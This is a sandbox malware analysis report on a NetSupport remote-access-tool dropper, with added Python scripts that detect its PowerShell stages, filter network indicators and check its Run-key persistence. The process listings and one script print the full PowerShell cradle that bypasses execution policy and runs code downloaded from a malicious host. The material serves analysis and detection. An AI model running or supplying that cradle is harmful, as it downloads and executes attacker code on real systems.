Malware Analysis Report

2024-10-19 01:40

Sample ID 240208-rvkp7aee7w
Target 08022024_2231_07022024_ARS4254253425425.zip
SHA256 e114869d32aeda56a855e734631e32f5fbcca0682cea3f773f938518a754014a
Tags
netsupport persistence rat
Score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score
10/10

SHA256

e114869d32aeda56a855e734631e32f5fbcca0682cea3f773f938518a754014a

Threat Level: Known bad

The file 08022024_2231_07022024_ARS4254253425425.zip was found to be: Known bad.

Malicious Activity Summary

netsupport persistence rat

NetSupport

Blocklisted process makes network request

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-08 14:30

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-08 14:30

Reported

2024-02-08 14:33

Platform

win7-20231215-en

Max time kernel

118s

Max time network

122s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS4254253425425.js

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS4254253425425.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"

Network

Country  Destination         Domain      Proto
US       8.8.8.8:53          assime.ca   udp
CA       67.43.225.106:443   assime.ca   tcp
CA       67.43.225.106:443   assime.ca   tcp

Files

memory/2660-4-0x000000001B250000-0x000000001B532000-memory.dmp

memory/2660-5-0x0000000002590000-0x0000000002598000-memory.dmp

memory/2660-6-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp

memory/2660-7-0x00000000025A0000-0x0000000002620000-memory.dmp

memory/2660-8-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp

memory/2660-9-0x00000000025A0000-0x0000000002620000-memory.dmp

memory/2660-10-0x00000000025A0000-0x0000000002620000-memory.dmp

memory/2660-11-0x00000000025A0000-0x0000000002620000-memory.dmp

memory/2660-12-0x00000000025A0000-0x0000000002620000-memory.dmp

memory/2660-13-0x00000000025A0000-0x0000000002620000-memory.dmp

memory/2660-14-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-08 14:30

Reported

2024-02-08 14:33

Platform

win10v2004-20231215-en

Max time kernel

143s

Max time network

151s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS4254253425425.js

Signatures

NetSupport

rat netsupport

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\modem_gprs_modules = "C:\\Users\\Admin\\AppData\\Local\\modem_gprs_modules\\client32.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS4254253425425.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Nop -ExeCUtIONPol bYPASS -W hI -eNco [base64 encoded command not reproduced in this copy of the report]

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe

"C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe"
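The two PowerShell command lines above (the stage-one download cradle, and the second stage written as -Nop -ExeCUtIONPol bYPASS -W hI -eNco) are the detection-relevant part of the process tree in both behavioral runs. powershell.exe accepts any unambiguous prefix of a parameter name in any letter case, so a detector has to normalise the parameters before matching. The following is an editor's added example, not part of the sandbox output: it canonicalises the host options, decodes -EncodedCommand, and flags the cradle pattern. The base64 after -eNco is a constructed placeholder encoded at run time, because the real encoded command is not reproduced on this page.

```python
"""Classify PowerShell command lines like the two stages in this report.

Editor's added example, not sandbox output. powershell.exe accepts any
unambiguous prefix of a parameter name in any letter case, so the second
stage's "-Nop -ExeCUtIONPol bYPASS -W hI -eNco" is really
-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand.
Normalising that first is what keeps simple string matching from being evaded.
The base64 after -eNco below is a constructed placeholder: the real encoded
command is not reproduced on this page.
"""
import base64
import re

# Canonical powershell.exe parameter names plus the host's documented short forms.
PARAMS = ("executionpolicy", "noprofile", "noninteractive", "nologo",
          "windowstyle", "encodedcommand", "command", "file")
SHORT = {"e": "encodedcommand", "ec": "encodedcommand", "enc": "encodedcommand",
         "ep": "executionpolicy"}
TOKEN_RE = re.compile(r'"[^"]*"|\S+')
CRADLE_RE = re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest"
                       r"|invoke-restmethod|\b(?:iwr|irm|curl|wget)\b", re.I)
IEX_RE = re.compile(r"invoke-expression|\biex\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def canonical_param(token):
    """-ExeCUtIONPol -> 'executionpolicy'; None if unknown or ambiguous (e.g. -n)."""
    name = token.lstrip("-").lower()
    if name in SHORT:
        return SHORT[name]
    hits = [p for p in PARAMS if p.startswith(name)]
    return hits[0] if len(hits) == 1 else None


def tokenize(cmdline):
    """Split a Windows command line, keeping each double-quoted span as one token."""
    return [t[1:-1] if len(t) > 1 and t[0] == t[-1] == '"' else t
            for t in TOKEN_RE.findall(cmdline)]


def parse_powershell(cmdline):
    """Return the effective host options and the script body (decoded if -enc)."""
    tokens = tokenize(cmdline)
    opts = {"switches": set(), "script": "", "encoded": False}
    i = 1                                   # tokens[0] is the interpreter path
    while i < len(tokens):
        name = canonical_param(tokens[i]) if tokens[i].startswith("-") else None
        has_value = i + 1 < len(tokens)
        if name in ("executionpolicy", "windowstyle") and has_value:
            opts[name] = tokens[i + 1].lower()
            i += 2
        elif name == "encodedcommand" and has_value:
            # -EncodedCommand carries base64 of the UTF-16LE script text.
            try:
                opts["script"] = base64.b64decode(tokens[i + 1]).decode("utf-16-le", "replace")
            except ValueError:
                opts["script"] = ""
            opts["encoded"] = True
            i += 2
        elif name == "command":
            opts["script"] = " ".join(tokens[i + 1:])   # the rest is the script
            break
        else:
            if name:
                opts["switches"].add(name)
            i += 1
    return opts


def triage(cmdline):
    """Findings for one command line, plus any URLs in the (decoded) script."""
    opts = parse_powershell(cmdline)
    findings = []
    if opts.get("executionpolicy") == "bypass":
        findings.append("execution_policy_bypass")
    # -WindowStyle takes the enum name, any prefix of it, or its number (1 = Hidden).
    if opts.get("windowstyle", "").startswith("h") or opts.get("windowstyle") == "1":
        findings.append("hidden_window")
    if "noprofile" in opts["switches"]:
        findings.append("no_profile")
    if opts["encoded"]:
        findings.append("encoded_command")
    if CRADLE_RE.search(opts["script"]):
        findings.append("download_cradle")
    if IEX_RE.search(opts["script"]):
        findings.append("invoke_expression")
    return {"findings": findings, "urls": URL_RE.findall(opts["script"]),
            "script": opts["script"]}


# Constructed stand-in for the elided second-stage payload.
_PLACEHOLDER_B64 = base64.b64encode(
    "Write-Host 'second stage not reproduced on this page'".encode("utf-16-le")).decode()

SAMPLES = {
    # Stage one, as listed under Processes.
    "stage1": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"''',
    # Stage two, as listed up to -eNco, followed by the placeholder payload.
    "stage2": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Nop -ExeCUtIONPol bYPASS -W hI -eNco ' + _PLACEHOLDER_B64,
}

if __name__ == "__main__":
    for stage, cmd in SAMPLES.items():
        print(stage, triage(cmd)["findings"], triage(cmd)["urls"])
```

Matching on the decoded script rather than the raw command line is the point: a rule that looks for the literal string "-EncodedCommand" or "Invoke-Expression" misses the second stage entirely, while the normalised form exposes the same three host options (policy bypass, hidden window, no profile) in both stages.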

Network

Country  Destination         Domain                        Proto
NL       52.142.223.178:80   -                             tcp
US       8.8.8.8:53          13.86.106.20.in-addr.arpa     udp
US       8.8.8.8:53          0.159.190.20.in-addr.arpa     udp
US       8.8.8.8:53          95.221.229.192.in-addr.arpa   udp
US       8.8.8.8:53          154.239.44.20.in-addr.arpa    udp
US       8.8.8.8:53          assime.ca                     udp
CA       67.43.225.106:443   assime.ca                     tcp
US       8.8.8.8:53          sakaleralo.com                udp
DE       192.121.22.184:80   sakaleralo.com                tcp
US       8.8.8.8:53          106.225.43.67.in-addr.arpa    udp
US       8.8.8.8:53          184.22.121.192.in-addr.arpa   udp
US       8.8.8.8:53          133.211.185.52.in-addr.arpa   udp
US       8.8.8.8:53          createcgroup.com              udp
GB       5.61.62.93:443      createcgroup.com              tcp
US       8.8.8.8:53          geo.netsupportsoftware.com    udp
US       104.26.1.231:80     geo.netsupportsoftware.com    tcp
US       8.8.8.8:53          93.62.61.5.in-addr.arpa       udp
US       8.8.8.8:53          231.1.26.104.in-addr.arpa     udp
US       8.8.8.8:53          26.165.165.52.in-addr.arpa    udp
US       8.8.8.8:53          171.39.242.20.in-addr.arpa    udp
US       8.8.8.8:53          18.134.221.88.in-addr.arpa    udp
US       8.8.8.8:53          16.234.44.23.in-addr.arpa     udp
US       8.8.8.8:53          19.229.111.52.in-addr.arpa    udp
US       8.8.8.8:53          26.178.89.13.in-addr.arpa     udp
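Most rows in the network tables of both behavioral runs are the sandbox's own resolver traffic and its reverse (PTR) lookups of addresses it saw, which say nothing about the sample; one row has no Domain column at all. The following is an editor's added example, not sandbox output, that parses the table as printed, drops that noise, and groups what remains by the name the sample actually contacted. The rows are copied from the behavioral2 table; the note attached to geo.netsupportsoftware.com is the editor's (a NetSupport Manager client checks in with that vendor host on start-up, so it corroborates the tool rather than identifying attacker infrastructure).

```python
"""Reduce a sandbox network table to the infrastructure the sample contacted.

Editor's added example, not sandbox output. Rows are copied from the report's
behavioral2 Network section (header included, so the parser has to skip it);
a row may lack the Domain column, and resolver/PTR rows are filtered out.
"""

NETWORK_TABLE = """\
Country Destination Domain Proto
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 assime.ca udp
CA 67.43.225.106:443 assime.ca tcp
US 8.8.8.8:53 sakaleralo.com udp
DE 192.121.22.184:80 sakaleralo.com tcp
US 8.8.8.8:53 106.225.43.67.in-addr.arpa udp
US 8.8.8.8:53 184.22.121.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 createcgroup.com udp
GB 5.61.62.93:443 createcgroup.com tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
US 104.26.1.231:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 93.62.61.5.in-addr.arpa udp
US 8.8.8.8:53 231.1.26.104.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 16.234.44.23.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.178.89.13.in-addr.arpa udp
"""

RESOLVER = "8.8.8.8"          # the sandbox's DNS forwarder, not sample infrastructure
# Editor's annotation: vendor hosts a legitimate NetSupport client also talks to.
VENDOR_HOSTS = {"geo.netsupportsoftware.com":
                "NetSupport Manager client start-up geolocation check"}


def parse_rows(table):
    """Parse 'Country Destination Domain Proto' rows; Domain may be absent or '-'."""
    rows = []
    for line in table.splitlines():
        fields = line.split()
        if len(fields) == 4:
            country, dest, domain, proto = fields
        elif len(fields) == 3:
            country, dest, proto = fields
            domain = None
        else:
            continue
        if ":" not in dest:          # header line
            continue
        ip, port = dest.rsplit(":", 1)
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": None if domain == "-" else domain, "proto": proto.lower()})
    return rows


def is_noise(row):
    """Resolver traffic and the sandbox's reverse lookups carry no IOC value."""
    if row["ip"] == RESOLVER and row["port"] == 53:
        return True
    return bool(row["domain"]) and row["domain"].endswith(".in-addr.arpa")


def extract_iocs(rows):
    """Group contacted endpoints by domain (or bare IP) and list names only resolved."""
    queried = {r["domain"] for r in rows
               if r["port"] == 53 and r["domain"] and not r["domain"].endswith(".in-addr.arpa")}
    contacted = {}
    for r in rows:
        if is_noise(r):
            continue
        key = r["domain"] or r["ip"]
        entry = contacted.setdefault(key, {"endpoints": set(), "countries": set(),
                                           "note": VENDOR_HOSTS.get(key)})
        entry["endpoints"].add(f"{r['ip']}:{r['port']}/{r['proto']}")
        entry["countries"].add(r["country"])
    for entry in contacted.values():
        entry["endpoints"] = sorted(entry["endpoints"])
        entry["countries"] = sorted(entry["countries"])
    return {"contacted": contacted, "resolved_only": sorted(queried - set(contacted))}


if __name__ == "__main__":
    for name, info in extract_iocs(parse_rows(NETWORK_TABLE))["contacted"].items():
        print(name, info["endpoints"], info["note"] or "")
```

The "resolved_only" list is empty for this run, but it is worth keeping: a name the sample looked up and never connected to usually means the host was down or the stage was skipped, and it is still an indicator.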

Files

memory/2300-0-0x000002597B930000-0x000002597B952000-memory.dmp

memory/2300-1-0x00007FFCF1EA0000-0x00007FFCF2961000-memory.dmp

memory/2300-2-0x000002597C050000-0x000002597C060000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fwaftq0m.3lm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2300-3-0x000002597C050000-0x000002597C060000-memory.dmp

memory/2996-22-0x00007FFCF1EA0000-0x00007FFCF2961000-memory.dmp

memory/2996-24-0x000001F279350000-0x000001F279360000-memory.dmp

memory/2996-23-0x000001F279350000-0x000001F279360000-memory.dmp

memory/2996-26-0x000001F27C080000-0x000001F27C092000-memory.dmp

memory/2996-27-0x000001F27BE30000-0x000001F27BE3A000-memory.dmp

memory/2300-30-0x00007FFCF1EA0000-0x00007FFCF2961000-memory.dmp

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe

MD5 a2b46c59f6e7e395d479b09464ecdba0
SHA1 92c132307dd21189b6d7912ddd934b50e50d1ec1
SHA256 89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1
SHA512 4f4479ddcd9d0986aec3d789f9e14f9285e8d9d63a5b8f73c9e3203d3a53cd575b1e15edf0d5f640816bb7f25bd3501244e0f7c181a716a6804742ed2f1cf916

C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICL32.dll

MD5 f4961e1dcc9ca34525a9e66a2787731d
SHA1 308508f833434fbc54d0f246af75edebb0da19c1
SHA256 a2c17891d955b5aa55233eb3a78f6f2298e80fd92526252c93599a037af9f2bf
SHA512 c930962383ee4f7affa0d651503fd6f0b0ac9a1f95f346eab3902c863f548969db097d5a7231b9e537eeebb9149ce1e4dc09e68ee0ae2616c7910c7b02b470ae

C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICL32.DLL

MD5 3524d668ae98cb143948d547e07a43ad
SHA1 630b1081e7aa69bdbd5a9fbeb86bc6268b1b2b8e
SHA256 fc1baab6d5960b56d427ac0e54c4f53ef3bafb7eee5d16ff457ea125ec3b3ba6
SHA512 10dbfa2a855bc65a25dbb439e040b71291cdc375c91485049c71db1c84325f1c3c6f21c57ec266f262dc480e3fc6da445f2acd3a28d5563038e0ae5daffaf7ad

C:\Users\Admin\AppData\Local\modem_gprs_modules\pcichek.dll

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICAPI.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

memory/2996-70-0x00007FFCF1EA0000-0x00007FFCF2961000-memory.dmp

C:\Users\Admin\AppData\Local\modem_gprs_modules\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 512c6cab650bfda6ef2995f6b515ed6f
SHA1 fec40abf4f5d74ea7f8828cee83770e423203083
SHA256 84871d83ecd410fb4ddede63061d9c521d876d47a8ffdbb8609378447ba0d262
SHA512 638fffef25de1c3e850eb4f4668c4fdafed7bde042b130325daf323b45d2784916381b410219473b5bbacb4c11c6b8b7ab892b3d5695edb0b0a0785233e8e19b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a2b24af1492f112d2e53cb7415fda39f
SHA1 dbfcee57242a14b60997bd03379cc60198976d85
SHA256 fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA512 9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

C:\Users\Admin\AppData\Local\modem_gprs_modules\NSM.LIC

MD5 866c96ba2823ac5fe70130dfaaa08531
SHA1 892a656da1ea264c73082da8c6e5f5728abcb861
SHA256 6a7c99e4bd767433c25d6df8df81baa99c05dd24fa064e45c306ff4d954e1921
SHA512 0dafc66222bbfcb1558d9845ee4ddeb7a687561b08b86a07b66b120c22952a8082e041d9234d9c69c8ade5d4dae894d3f10afd7ba6dd3f057a08fb5d57c42112

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.ini

MD5 2cd1a8115b7328756129052384e2eed6
SHA1 9458e9553d3d1f075ed09a06fda3f36136781704
SHA256 02ab893e7d31d7c3b18d27c3c4ef6e056da27cc6ad7efa76b8d4729403a067d2
SHA512 df5630c14f1400166ecbf0854a48616c939c0467634c427f8a287edc5c064c0d259b1cec0b02ae7aa31e21d1609ff31f4e11285160323f2c24fcb02de4e20455

C:\Users\Admin\AppData\Local\modem_gprs_modules\HTCTL32.DLL

MD5 2d3b207c8a48148296156e5725426c7f
SHA1 ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256 edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA512 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

memory/2300-86-0x00007FFCF1EA0000-0x00007FFCF2961000-memory.dmp
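The Run key written under Signatures (modem_gprs_modules pointing at client32.exe in AppData\Local) and the file set listed above (client32.exe, client32.ini, NSM.LIC, PCICL32.dll, HTCTL32.DLL, pcichek.dll, PCICAPI.dll) are the two host artifacts worth correlating: the first is user-writable autostart, the second is the standard NetSupport Manager client regardless of what the folder is named. The following is an editor's added example, not sandbox output, that reads the Run-key indicator line as the report prints it, extracts the executable, and checks the dropped files in that directory against the NetSupport file set. The indicator line and file paths are copied from this report; the benign second entry and its vendor paths are constructed, and the location rules are the editor's own heuristics.

```python
"""Correlate the Run-key autostart entry with the dropped file set.

Editor's added example, not sandbox output. The Run-key indicator line and the
dropped-file paths are copied from this report; the second, benign entry is
constructed (hypothetical vendor paths). client32.exe, client32.ini, NSM.LIC and
the PCI*/HTCTL32 DLLs are the files a NetSupport Manager client ships with, so a
directory holding most of them is that client whatever the folder is called.
The location rules (user-writable autostart target, NetSupport outside Program
Files) are the editor's own triage heuristics.
"""
import re
from pathlib import PureWindowsPath

RUN_KEY_RE = re.compile(
    r'Set value \(str\) (?P<key>\\REGISTRY\\\S+?\\CurrentVersion\\(?:Run|RunOnce))'
    r'\\(?P<name>\S+) = "(?P<data>[^"]*)"', re.I)
# A quoted path, or an unquoted one ending in an executable extension followed by
# a space or the end, so "C:\Program Files\x\a.exe /tray" is not cut at the space.
EXE_RE = re.compile(r'^(?:"(?P<q>[^"]+)"|(?P<u>.+?\.(?:exe|com|scr|bat|cmd|vbs|js|dll))(?:\s|$))', re.I)
NETSUPPORT_FILES = {"client32.exe", "client32.ini", "nsm.lic", "pcicl32.dll",
                    "htctl32.dll", "pcichek.dll", "pcicapi.dll"}
USER_WRITABLE = {"users", "programdata", "temp", "tmp"}


def executable_from_value(data):
    """Executable path from a Run value's data (the report prints it JSON-escaped)."""
    data = data.replace("\\\\", "\\").strip()
    m = EXE_RE.match(data)
    if m:
        return m.group("q") or m.group("u")
    return data.split()[0] if data else ""


def triage_autostart(indicator_line, dropped_files):
    """None if the line is not a Run/RunOnce write; otherwise the entry and findings."""
    m = RUN_KEY_RE.search(indicator_line)
    if not m:
        return None
    exe = PureWindowsPath(executable_from_value(m.group("data")))
    parts = {p.strip("\\").lower() for p in exe.parts}
    findings = []
    if parts & USER_WRITABLE:
        findings.append("autostart_from_user_writable_path")
    # Dropped files that sit next to the autostart target (case-insensitive, so the
    # report's PCICL32.dll / PCICL32.DLL pair collapses to one name).
    siblings = {PureWindowsPath(f).name.lower() for f in dropped_files
                if PureWindowsPath(f).parent == exe.parent}
    hits = NETSUPPORT_FILES & siblings
    if len(hits) >= 4:
        findings.append("netsupport_client_fileset")
        if not parts & {"program files", "program files (x86)"}:
            findings.append("netsupport_outside_program_files")
    return {"value_name": m.group("name"), "executable": str(exe),
            "directory": str(exe.parent), "fileset_hits": sorted(hits),
            "findings": findings}


# Copied from the report's "Adds Run key to start application" indicator.
RUN_KEY_LINE = (
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000'
    r'\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\modem_gprs_modules = '
    r'"C:\\Users\\Admin\\AppData\\Local\\modem_gprs_modules\\client32.exe" '
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A'
)
# Constructed benign entry with hypothetical vendor paths, for contrast.
BENIGN_LINE = (
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000'
    r'\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorAgent = '
    r'"C:\\Program Files\\Vendor\\agent.exe /tray" C:\Program Files\Vendor\setup.exe N/A'
)
# Copied from the report's Files section (memory dumps omitted).
DROPPED_FILES = [
    r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fwaftq0m.3lm.ps1",
    r"C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe",
    r"C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICL32.dll",
    r"C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICL32.DLL",
    r"C:\Users\Admin\AppData\Local\modem_gprs_modules\pcichek.dll",
    r"C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICAPI.dll",
    r"C:\Users\Admin\AppData\Local\modem_gprs_modules\msvcr100.dll",
    r"C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log",
    r"C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive",
    r"C:\Users\Admin\AppData\Local\modem_gprs_modules\NSM.LIC",
    r"C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.ini",
    r"C:\Users\Admin\AppData\Local\modem_gprs_modules\HTCTL32.DLL",
]

if __name__ == "__main__":
    for line in (RUN_KEY_LINE, BENIGN_LINE):
        print(triage_autostart(line, DROPPED_FILES))
```

On a live host the same two checks translate directly: enumerate HKCU\...\CurrentVersion\Run values whose target lives under a user profile, and list the target's directory for the NetSupport file names; the Run value name and folder name are attacker-chosen and will vary, the file set will not.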